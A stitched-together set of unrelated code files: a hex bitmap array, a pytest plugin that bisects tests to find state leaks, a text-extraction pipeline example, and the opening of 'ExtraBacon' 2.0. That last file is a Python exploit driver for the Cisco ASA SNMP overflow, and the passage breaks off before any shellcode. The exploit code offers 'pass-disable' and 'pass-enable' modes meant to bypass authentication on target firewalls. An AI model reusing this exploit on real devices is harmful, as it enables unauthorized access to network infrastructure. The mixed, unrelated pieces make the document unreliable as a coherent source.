0X3E,0X00,0X70,0X1C,0X00,0X1C,0X00,0X01,0XF0,0X01,0XC0,0XF0,0X00,0X78,0X3C,0X00,
0XE0,0X00,0XF8,0X38,0X03,0XE0,0X0E,0X07,0X00,0X07,0XC1,0XE0,0X0F,0X00,0X0F,0X00,
0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X7F,0XFF,0XC0,0X0E,
0X00,0X07,0X80,0X0E,0X07,0X80,0X01,0XE0,0XF0,0X07,0X00,0X03,0X80,0X00,0X3C,0X00,
0X0F,0X03,0X00,0XFC,0X01,0X81,0XC0,0X00,0XF0,0X70,0X00,0X38,0X00,0X1C,0X0F,0X00,
0X1C,0X00,0X70,0X38,0X00,0X1C,0X00,0X01,0XE0,0X01,0XC0,0XE0,0X00,0X78,0X3C,0X01,
0XE0,0X00,0X78,0X1C,0X03,0XE0,0X0E,0X0F,0X00,0X03,0XC1,0XC0,0X0E,0X00,0X07,0X00,
0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0XFF,0XFF,0XC0,0X07,
0X00,0X07,0X00,0X06,0X07,0X00,0X00,0XE0,0XE0,0X07,0X00,0X01,0XC0,0X00,0X38,0X00,
0X0F,0X03,0X80,0XE6,0X03,0X81,0XC0,0X00,0X78,0X38,0X00,0X38,0X00,0X0E,0X0F,0X00,
0X1C,0X00,0X70,0X38,0X00,0X0E,0X00,0X01,0XE0,0X01,0XC0,0XE0,0X00,0X38,0X38,0X01,
0XC0,0X00,0X38,0X1C,0X07,0X70,0X1C,0X0E,0X00,0X03,0XC1,0XC0,0X1C,0X00,0X03,0X00,
0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X01,0XFF,0XFF,0XC0,0X07,
0X80,0X07,0X00,0X07,0X07,0X00,0X00,0XE0,0XE0,0X0F,0X00,0X01,0XC0,0X00,0X38,0X00,
0X07,0X03,0X80,0XCE,0X03,0X81,0XC0,0X00,0X78,0X3C,0X00,0X70,0X00,0X0E,0X0E,0X00,
0X1C,0X00,0X70,0X70,0X00,0X0E,0X00,0X01,0XC0,0X01,0XC1,0XC0,0X00,0X38,0X38,0X01,
0XC0,0X00,0X38,0X0C,0X07,0X70,0X1C,0X0E,0X00,0X01,0XC1,0XC0,0X1C,0X00,0X03,0X80,
0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X03,0XFF,0XFF,0XC0,0X03,
0XE0,0X07,0X00,0X07,0X07,0X00,0X00,0XE0,0XE0,0X0F,0XFF,0XFF,0XC0,0X00,0X30,0X00,
0X07,0X01,0XC1,0XC7,0X07,0X03,0XFF,0XFF,0XF8,0X1F,0X00,0X70,0X00,0X0E,0X0E,0X00,
0X1C,0X00,0X70,0X7F,0XFF,0XFE,0X00,0X01,0XC0,0X01,0XC1,0XC0,0X00,0X18,0X38,0X01,
0X80,0X00,0X38,0X0E,0X0E,0X38,0X38,0X1C,0X00,0X01,0XC1,0XC0,0X1F,0XFF,0XFF,0X80,
0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X07,0XFF,0XFF,0XC0,0X01,
0XF8,0X07,0X00,0X07,0X06,0X00,0X00,0XE0,0XE0,0X0F,0XFF,0XFF,0XC0,0X00,0X70,0X00,
0X07,0X01,0XC1,0XC7,0X07,0X03,0XFF,0XFF,0XF8,0X0F,0XC0,0X70,0X00,0X06,0X0E,0X00,
0X1C,0X00,0X70,0X7F,0XFF,0XFE,0X00,0X01,0XC0,0X01,0XC1,0XC0,0X00,0X18,0X38,0X03,
0X80,0X00,0X38,0X0E,0X0E,0X38,0X38,0X1C,0X00,0X01,0XC1,0XC0,0X1F,0XFF,0XFF,0X80,
0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X0F,0XFF,0XFF,0XC0,0X00,
0X7C,0X07,0X00,0X07,0X06,0X00,0X00,0XE0,0XE0,0X0E,0X00,0X00,0X00,0X00,0X70,0X00,
0X07,0X00,0XE3,0X83,0X8E,0X03,0X80,0X00,0X00,0X03,0XE0,0X70,0X00,0X06,0X0E,0X00,
0X1C,0X00,0X70,0X70,0X00,0X00,0X00,0X01,0XC0,0X01,0XC1,0XC0,0X00,0X18,0X38,0X03,
0X80,0X00,0X38,0X07,0X1C,0X1C,0X70,0X1C,0X00,0X01,0XC1,0XC0,0X1C,0X00,0X00,0X00,
0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X3F,0XFF,0XFF,0XC0,0X00,
0X1E,0X07,0X00,0X07,0X07,0X00,0X00,0XE0,0XE0,0X0E,0X00,0X00,0X00,0X00,0X30,0X00,
0X07,0X00,0XE3,0X83,0X8E,0X03,0X80,0X00,0X00,0X00,0XF0,0X70,0X00,0X0E,0X0E,0X00,
0X1C,0X00,0X70,0X70,0X00,0X00,0X00,0X01,0XC0,0X01,0XC1,0XC0,0X00,0X18,0X38,0X01,
0X80,0X00,0X38,0X07,0X1C,0X1C,0X70,0X1C,0X00,0X01,0XC1,0XC0,0X1C,0X00,0X00,0X00,
0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X7F,0XFF,0XFF,0XC0,0X00,
0X0F,0X07,0X00,0X07,0X07,0X00,0X00,0XE0,0XE0,0X0E,0X00,0X00,0X00,0X00,0X38,0X00,
0X07,0X00,0XE7,0X01,0XCC,0X01,0X80,0X00,0X00,0X00,0X78,0X70,0X00,0X0E,0X0E,0X00,
0X1C,0X00,0X70,0X70,0X00,0X00,0X00,0X01,0XC0,0X01,0XC1,0XC0,0X00,0X38,0X38,0X01,
0XC0,0X00,0X38,0X03,0X18,0X0E,0X60,0X0E,0X00,0X01,0XC1,0XC0,0X1C,0X00,0X00,0X00,
0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0XFF,0XFF,0XFF,0XC0,0X00,
0X07,0X07,0X00,0X07,0X07,0X00,0X00,0XE0,0XE0,0X07,0X00,0X00,0X00,0X00,0X38,0X00,
0X0F,0X00,0X77,0X01,0XCC,0X01,0XC0,0X00,0X00,0X00,0X38,0X70,0X00,0X0E,0X0E,0X00,
0X1C,0X00,0X70,0X38,0X00,0X00,0X00,0X01,0XC0,0X01,0XC0,0XE0,0X00,0X38,0X38,0X01,
0XC0,0X00,0X38,0X03,0XB8,0X0E,0XE0,0X0E,0X00,0X03,0XC1,0XC0,0X1C,0X00,0X00,0X00,
0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF9,0XFF,0XFF,0XFF,0XC0,0X00,
0X03,0X07,0X00,0X07,0X07,0X80,0X01,0XE0,0XE0,0X07,0X00,0X01,0X80,0X00,0X38,0X00,
0X0F,0X00,0X7E,0X01,0XFC,0X01,0XC0,0X00,0X70,0X00,0X38,0X38,0X00,0X1C,0X0E,0X00,
0X1C,0X00,0X70,0X38,0X00,0X0C,0X00,0X01,0XC0,0X01,0XC0,0XE0,0X00,0X38,0X38,0X01,
0XE0,0X00,0X78,0X01,0XF8,0X0F,0XE0,0X0E,0X00,0X03,0XC1,0XC0,0X0E,0X00,0X07,0X00,
0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X03,0X07,0X00,0X07,0X03,0X80,0X01,0XE0,0XE0,0X07,0X80,0X03,0X80,0X00,0X1C,0X00,
0X1F,0X00,0X3E,0X00,0XF8,0X00,0XE0,0X00,0XF0,0X00,0X38,0X3C,0X00,0X1C,0X0E,0X00,
0X1C,0X00,0X70,0X3C,0X00,0X1C,0X00,0X01,0XC0,0X01,0XC0,0XF0,0X00,0X78,0X38,0X00,
0XE0,0X00,0XF8,0X01,0XF0,0X07,0XC0,0X07,0X00,0X07,0XC1,0XC0,0X0E,0X00,0X07,0X00,
0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X07,0X07,0X00,0X07,0X01,0XC0,0X07,0XE0,0XE0,0X03,0XC0,0X07,0X00,0X00,0X1E,0X00,
0X3F,0X00,0X3C,0X00,0XF8,0X00,0XF0,0X01,0XF0,0X00,0X38,0X1E,0X00,0X38,0X0E,0X00,
0X1C,0X00,0X70,0X1E,0X00,0X38,0X00,0X01,0XC0,0X01,0XC0,0X78,0X00,0XF8,0X38,0X00,
0X70,0X01,0XF8,0X01,0XF0,0X07,0XC0,0X07,0X80,0X0F,0XC1,0XC0,0X07,0X00,0X0E,0X00,
0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X0C,
0X0F,0X07,0X00,0X07,0X01,0XF0,0X0F,0XE0,0XE0,0X01,0XE0,0X1F,0X00,0X00,0X0F,0X00,
0X7F,0X00,0X1C,0X00,0X70,0X00,0X78,0X03,0XE0,0X60,0X78,0X0F,0X00,0XF8,0X0E,0X00,
0X1C,0X00,0X70,0X0F,0X00,0XF8,0X00,0X01,0XC0,0X01,0XC0,0X3C,0X03,0XF8,0X38,0X00,
0X7C,0X03,0XF8,0X00,0XE0,0X03,0X80,0X03,0XC0,0X1F,0XC1,0XC0,0X03,0XC0,0X3C,0X00,
0X00,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X0F,
0X1E,0X07,0X00,0X07,0X00,0XFC,0X7E,0XE0,0XE0,0X00,0XF8,0X7E,0X00,0X00,0X07,0XE3,
0XF7,0X00,0X1C,0X00,0X70,0X00,0X3F,0X1F,0XC0,0X7C,0XF0,0X07,0XC3,0XF0,0X0E,0X00,
0X1C,0X00,0X70,0X07,0XC3,0XF0,0X00,0X01,0XC0,0X01,0XC0,0X1F,0X8F,0X98,0X38,0X00,
0X3F,0X1F,0XB8,0X00,0XE0,0X03,0X80,0X01,0XF8,0XFD,0XC1,0XC0,0X03,0XF1,0XFC,0X00,
0X00,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X07,
0XFC,0X07,0X00,0X07,0X00,0X3F,0XF8,0XE0,0XE0,0X00,0X7F,0XF8,0X00,0X00,0X03,0XFF,
0XC7,0X00,0X18,0X00,0X30,0X00,0X1F,0XFF,0X00,0X3F,0XE0,0X03,0XFF,0XC0,0X0E,0X00,
0X1C,0X00,0X70,0X03,0XFF,0XC0,0X00,0X01,0XC0,0X01,0XC0,0X0F,0XFF,0X38,0X38,0X00,
0X0F,0XFE,0X38,0X00,0X40,0X01,0X00,0X00,0X7F,0XF1,0XC1,0XC0,0X00,0XFF,0XF0,0X00,
0X00,0X00,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X03,
0XF8,0X07,0X00,0X06,0X00,0X1F,0XF0,0XE0,0XE0,0X00,0X1F,0XF0,0X00,0X00,0X00,0XFF,
0X06,0X00,0X00,0X00,0X30,0X00,0X07,0XFE,0X00,0X1F,0XC0,0X00,0XFF,0X00,0X06,0X00,
0X18,0X00,0X30,0X00,0XFF,0X80,0X00,0X00,0XC0,0X01,0XC0,0X03,0XFC,0X18,0X38,0X00,
0X07,0XFC,0X38,0X00,0X00,0X00,0X00,0X00,0X3F,0XC1,0X81,0X80,0X00,0X3F,0XC0,0X00,
0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
]
|
# -*- coding: utf-8 -*-
from typing import TYPE_CHECKING, List, Optional
import pytest
from _pytest import nodes
from _pytest.config import Config
from _pytest.config.argparsing import Parser
from _pytest.main import Session
from _pytest.reports import TestReport
if TYPE_CHECKING:
from _pytest.cacheprovider import Cache
CACHE_NAME = "cache/leakfinder"
def pytest_addoption(parser: Parser) -> None:
    """Register the ``--leak-finder`` command line flag with pytest."""
    general = parser.getgroup("general")
    general.addoption(
        "--leak-finder",
        action="store_true",
        default=False,
        dest="leakfinder",
        help="Bisect previous passed tests until find one that fail",
    )
@pytest.hookimpl
def pytest_configure(config: Config) -> None:
    """Activate LeakFinderPlugin only when ``--leak-finder`` was given."""
    if not config.getoption("leakfinder"):
        return
    config.pluginmanager.register(LeakFinderPlugin(config), "leakfinderplugin")
def pytest_sessionfinish(session: Session) -> None:
    """Reset the stored bisection state whenever the plugin is not active."""
    if session.config.getoption("leakfinder"):
        return
    cache = session.config.cache
    assert cache is not None
    # Clear the cache if the plugin is not active.
    cache.set(CACHE_NAME, {"steps": "", "target": None})
def bizect(l, steps="a"):
    """
    given a list, select the a/b n-th group plus the last element
    >>> l = list(range(10))
    >>> bizect(l)
    [0, 1, 2, 3, 4, 9]
    >>> bizect(l, steps="b")
    [5, 6, 7, 8, 9]
    >>> bizect(l, "ba")
    [5, 6, 9]
    >>> bizect(l, "bb")
    [7, 8, 9]
    """
    selected = list(l)
    for choice in steps:
        half = len(selected) // 2
        if choice == "a":
            # Keep the first half of the current selection.
            selected = selected[:half]
        else:
            # Keep the second half, dropping the sentinel last element
            # (it is re-appended below on every step).
            selected = selected[half:-1]
        selected = selected + [l[-1]]
    return selected
class LeakFinderPlugin:
    """Bisect previously passing tests to find the one that breaks a target.

    State persisted in pytest's cache between runs:
      - ``steps``: the bisection path so far, a string of "a"/"b" choices
        consumed by :func:`bizect`.
      - ``target``: node id of the first test that failed on the initial run.
    """

    def __init__(self, config: Config) -> None:
        self.config = config
        self.session: Optional[Session] = None
        self.report_status = ""
        # config.cache is Optional in pytest's typing; the plugin requires
        # the cacheprovider to be enabled (i.e. not -p no:cacheprovider).
        self.cache: Cache = config.cache
        self.previous = self.cache.get(CACHE_NAME, {"steps": "", "target": None})
        self.target = self.previous.get("target")

    def pytest_sessionstart(self, session: Session) -> None:
        # Keep the session so pytest_runtest_logreport can stop the run early.
        self.session = session

    def pytest_collection_modifyitems(
        self, config: Config, items: List[nodes.Item]
    ) -> None:
        """Deselect everything outside the current bisection group."""
        if not self.target:
            self.report_status = "no previously failed tests, not skipping."
            return
        # check all item nodes until we find a match on last failed
        failed_index = None
        for index, item in enumerate(items):
            if item.nodeid == self.target:
                failed_index = index
                break
        # If the previously failed test was not found among the test items,
        # do not skip any tests.
        # BUG FIX: compare against None explicitly -- the target may
        # legitimately be the first collected item (index 0), which is falsy
        # and previously disabled bisection entirely in that case.
        if failed_index is not None:
            new_items = bizect(items[:failed_index + 1], steps=self.previous["steps"])
            deselected = set(items) - set(new_items)
            items[:] = new_items
            config.hook.pytest_deselected(items=deselected)

    def pytest_runtest_logreport(self, report: TestReport) -> None:
        """Record the target on the first run; refine the bisection after."""
        if not self.previous["steps"] and report.failed:
            # the first fail on the first run set the target
            self.previous["target"] = report.nodeid
            self.previous["steps"] += "a"
            # NOTE(review): assumes pytest_sessionstart already ran, so
            # self.session is set -- confirm hook ordering if refactoring.
            self.session.shouldstop = True
            print(f"\nLeak finder: target set to {report.nodeid}")
        elif report.nodeid == self.previous["target"] and report.when == "call":
            if report.failed:
                print("\nLeak finder: The group selected still fails. Let's do a new partition.")
                self.previous["steps"] += "a"
            else:
                print("\nLeak finder: We reach the target and nothing failed. Let's change the last half.")
                self.previous["steps"] = self.previous["steps"][:-1] + "b"

    def pytest_sessionfinish(self) -> None:
        # Persist the bisection state for the next pytest invocation.
        self.cache.set(CACHE_NAME, self.previous)
|
import re
import xml.etree.ElementTree as ET

import subprocess32 as subproces

import extraction.utils as utils
from extraction.core import ExtractionRunner
from extraction.runnables import Filter, Extractor, ExtractorResult
from extraction.runnables import RunnableError
# Define extractors and filters
class HasNumbersFilter(Filter):
    """Filter that passes only documents containing at least one digit."""
    def filter(self, data, deps):
        # re.search yields a match object (truthy) or None.
        match = re.search(r'[0-9]', data, re.UNICODE)
        return match is not None
class EmailExtractor(Extractor):
    """Extracts e-mail addresses from the input text into an XML tree."""
    result_file_name = 'emails.xml'

    def extract(self, data, deps):
        email_pattern = r'\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b'
        root = ET.Element('extraction')
        # One <email> child element per address found.
        for address in re.findall(email_pattern, data, re.IGNORECASE | re.UNICODE):
            ET.SubElement(root, 'email').text = address
        return ExtractorResult(xml_result=root)
class LinesStartWithNumberExtractor(Extractor):
    """Extracts every input line that begins with a digit (via awk) into an
    XML tree.

    Depends on HasNumbersFilter so it only runs on inputs containing at
    least one digit.

    Raises:
        RunnableError: if the external awk process exceeds its 5s timeout.
    """
    dependencies = frozenset([HasNumbersFilter])

    def extract(self, data, deps):
        try:
            (status, stdout, stderr) = utils.external_process(
                ['awk', '/^[0-9]/ {print;}', '-'], input_data=data, timeout=5)
        # BUG FIX: the module is imported as `subproces` (note the typo in
        # the import alias); the original caught `subprocess.TimeoutExpired`,
        # an undefined name, so a timeout would itself raise NameError.
        # NOTE(review): assumes utils.external_process propagates
        # subprocess32's TimeoutExpired — confirm against extraction.utils.
        except subproces.TimeoutExpired:
            raise RunnableError('awk timed out')
        # Drop empty lines left by the trailing newline of awk's output.
        lines = [line for line in stdout.split("\n") if line]
        root = ET.Element('extraction')
        for line in lines:
            ele = ET.SubElement(root, 'line')
            ele.text = line
        return ExtractorResult(xml_result=root)
# Set up and run extraction
# Register the filter and both extractors, then run the pipeline once over an
# inline sample document; results are written under
# extraction/test/sample_output for the run named 'Sample Data'.
extraction_runner = ExtractionRunner()
extraction_runner.add_runnable(HasNumbersFilter)
extraction_runner.add_runnable(EmailExtractor)
extraction_runner.add_runnable(LinesStartWithNumberExtractor)
extraction_runner.run(u'''Random data that contains some emails bob@example.com
Test lines with some @ signs now and then. Meet you@home@2p.m.
Line with another email embedded howie009@yahoo.com in the line.
jones@gmail.com fredie@emerson.retail.com
123 Some lines even start with numbers
Some lines don't start with numbers
004 The final line in the test data''', 'extraction/test/sample_output', run_name = 'Sample Data')
|
#!/usr/bin/env python2
"""
Our goal with version 2.0 of ExtraBacon is to support more ASA versions, as well
as simplify the Python and payload shellcode. This means stripping as much as
possible from the shellcode and Python to still be functional.
"""
import sys
import string
import subprocess
import binascii
import random
import datetime
improved_dir = "./improved"
sys.path.insert(0, '..')
from Mexeggs.all import *
from Mexeggs import *
from scapy.all import *
##
##
##
class ExtrabaconInfoSubcommand(sploit.InfoSubcommand):
    """'info' subcommand: restricts the framework's generic transport options
    to the SNMP v2c-only transport this (historical, 2016-era) module uses."""
    expect_filename_argument = False ## no filename positional for this subcommand
    def setup_parser(self, parser):
        super(ExtrabaconInfoSubcommand, self).setup_parser(parser)
        self.parser = parser
        ##
        # Narrow the inherited --version option down to SNMP v2c only.
        for a in self.parser._actions:
            if a.dest == "version":
                a.choices = ['v2c']
                a.help = 'SNMP version (v2c only)'
    def run(self, exp):
        super(ExtrabaconInfoSubcommand, self).run(exp)
##
##
##
##
class ExtrabaconExecSubcommand(sploit.ExecSubcommand):
    """'exec' subcommand: adds the --mode and --msg options on top of the
    framework's generic exec options, restricted to SNMP v2c."""
    expect_filename_argument = False ## no filename positional for this subcommand
    def setup_parser(self, parser):
        super(ExtrabaconExecSubcommand, self).setup_parser(parser)
        self.parser = parser
        ##
        # Narrow the inherited --version option down to SNMP v2c only.
        for a in self.parser._actions:
            if a.dest == "version":
                a.choices = ['v2c']
                a.help = 'SNMP version (v2c only)'
        # Mode of operation is mandatory for exec.
        self.parser.add_argument('--mode',
                                 help='select mode of operation',
                                 choices=["pass-disable", "pass-enable", "mettle"],
                                 required=True,
                                 default=None)
        self.parser.add_argument('--msg',
                                 help='print success message on console of target (DO NOT USE)',
                                 dest='msg',
                                 action='store_true',
                                 required=False,
                                 default=False)
    def run(self, exp):
        super(ExtrabaconExecSubcommand, self).run(exp)
class Extrabacon(Sploit):
    """Framework driver for the historical "ExtraBacon" Cisco ASA SNMP
    overflow (CVE-2016-6366; publicly leaked and patched in 2016).

    Workflow: ``touch`` fingerprints the target over SNMP, the detected
    firmware version is stored as key data, and ``exec`` assembles a
    version-specific SNMP packet from pre-generated shellcode modules found
    under ``improved_dir``.  Python 2 code; kept for archival/analysis.
    """
    def setup_parser(self):
        super(Extrabacon, self).setup_parser()
        ##
        self.add_subcommand(ExtrabaconInfoSubcommand())
        ##
        self.add_subcommand(ExtrabaconExecSubcommand())
        ##
        ##
    def generate_touch(self):
        # SNMP GET of sysDescr.0 / sysUpTime.0 / sysName.0: a benign probe
        # used to fingerprint the target before anything else happens.
        return SNMP(version = self.params.version,
                    community = self.params.community,
                    PDU = SNMPget(varbindlist = [SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.1.0')),
                                                 SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.3.0')),
                                                 SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.5.0'))]))
    def fw_version_check(self, vers_string):
        """Map a sysDescr string to a version token; 'unsupported' when no
        matching shellcode module exists on disk."""
        # let's try a more generic approach
        version = vers_string.split("Version ")[1]
        version = version.replace(".", "_")
        # well this is crappy
